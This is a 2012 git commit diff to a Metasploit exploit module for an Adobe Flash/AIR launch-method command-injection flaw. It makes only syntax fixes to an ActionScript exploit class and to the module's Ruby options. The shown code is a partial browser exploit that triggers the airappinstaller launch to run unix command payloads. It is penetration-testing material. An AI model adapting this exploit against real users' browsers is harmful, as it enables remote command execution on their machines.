Minor fixes

unstable
sinn3r 2012-04-19 18:07:35 -05:00
parent 835d8b209d
commit f5e8f57497
2 changed files with 7 additions and 3 deletions

View File

@ -7,19 +7,23 @@ PoC: http://downloads.securityfocus.com/vulnerabilities/exploits/32896.as
import flash.external.ExternalInterface;
class Exploit {
public function randname(newLength:Number):String{
var a:String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
var alphabet:Array = a.split("");
var randomLetter:String = "";
for (var i:Number = 0; i < newLength; i++){
randomLetter += alphabet[Math.floor(Math.random() * alphabet.length)];
}
return randomLetter;
}
public function exploit() {
var path:String = ExternalInterface.call("window.location.href.toString") + randname(6) + ".txt";
var loadVars:LoadVars = new LoadVars();
loadVars.onData = function(str:String):Void {
if (str) {
if (_global.ASnative(2201, 1)("airappinstaller")) {
@ -33,7 +37,7 @@ class Exploit {
}
public function Exploit() {
exploit()
exploit();
}
static function main() {

View File

@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
version 10.0.12.36 and 9.0.151.0 and prior.
An input validation vulnerability allows command execution when the browser
loads a SWF file which contains shell metacharacters in the arguments to
the ActionScript launch method.
the ActionScript launch method.
The victim must have Adobe AIR installed for the exploit to work. This module
was tested against version 10.0.12.36 (10r12_36).
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultOptions' =>
{
'HTTP::compression' => 'gzip',
'HTTP::chunked' => true,
'HTTP::chunked' => true
},
'Platform' => 'unix', # so unix cmd exec payloads are ok
'Arch' => ARCH_CMD,